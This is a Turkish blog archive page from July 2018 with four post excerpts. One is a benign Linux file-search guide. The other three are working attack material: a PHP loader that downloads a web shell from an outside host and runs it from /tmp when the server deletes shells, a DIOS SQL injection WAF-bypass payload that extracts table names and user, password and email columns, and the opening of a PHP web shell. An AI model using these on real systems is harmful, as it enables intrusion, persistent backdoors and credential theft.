İçeriğe geç

Ay: Temmuz 2018

Linux Dosyalar içinde detaylı ( kelime, dosya ) arama

Linux işletim sisteminde yerini unuttuğumuz dosyayı bulmak için find ve locate komutunu kullanabiliriz.    Find komutunun kullanılması  Sadece belirtilen dizin yolu ve alt dizinler içirisinde arama yapar. # find /dizin_yolu/  -name “dosya_adi” Yukarıda verdiğimiz arama kalıbına göre kullanımını çeşitlendirebiliriz. 1. Sadece aradığımız dosyayı bulmak istiyorsak;   #find /etc/ -name “my.cnf” 2.…

Sunucu otomatik shelli siliyorsa

Burada Url yazan yere çalıştırmak istediğin shellin linkini gir. Bu shell tmp dizinine atılır ve oradan çağırılarak çalıştırılır. <?php //*thanx for idx $URL = ‘http://shelladresi.com’; $TMP = ‘/tmp/sess_’.md5($_SERVER[‘HTTP_HOST’]).’.php’; # dont change this !! function M() { $FGT = @file_get_contents($GLOBALS[‘URL’]); if(!$FGT) { echo `curl -k $(echo {$GLOBALS[‘URL’]} | base64 -d) >…

DİOS WAF Sql İnjection Bypass

TABLO ADI VE KOLON ADI BİLGİLERİNİ ÇIKARIR (SeLecT(@x)FrOm(SeLecT(@x:=0x00),(SeLecT(@x)FrOm(/*!50000iNfoRMaTioN_ScHeMa.coLumNs*/)wHeRe(TaBLe_ScHeMa!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=/*!50000CoNcaT*/(@x,0x3c62723e,TaBLe_NaMe,0x203a3a20,CoLumN_NaMe))))x) M KOLONDAKİ BİLGİLERİ ÇEKER (SeLecT(@x)FrOm(SeLecT(@x:=0x00),(SeLecT(@x)FrOm(usercontrol)wHeRe(0x00)in(@x:=/*!50000CoNcaT*/(@x,0x3c62723e,kulladi,0x203a3a20,kullsif,0x203a3a20,email))))x)

Privat Shell

  <?php error_reporting(0); set_time_limit(0); if(get_magic_quotes_gpc()){ foreach($_POST as $key=>$value){ $_POST[$key] = stripslashes($value); } } echo ‘<!DOCTYPE HTML> <html> <head> <link href=”” rel=”stylesheet” type=”text/css”> <title>thePriVat SHELL</title> <style> body{ font-family: “Monospace”, cursive; background-color: black; color:red; } #content tr:hover{ background-color: blue; text-shadow:0px 0px 10px #fff; } #content .first{ background-color: cyan; } table{ border: 1px…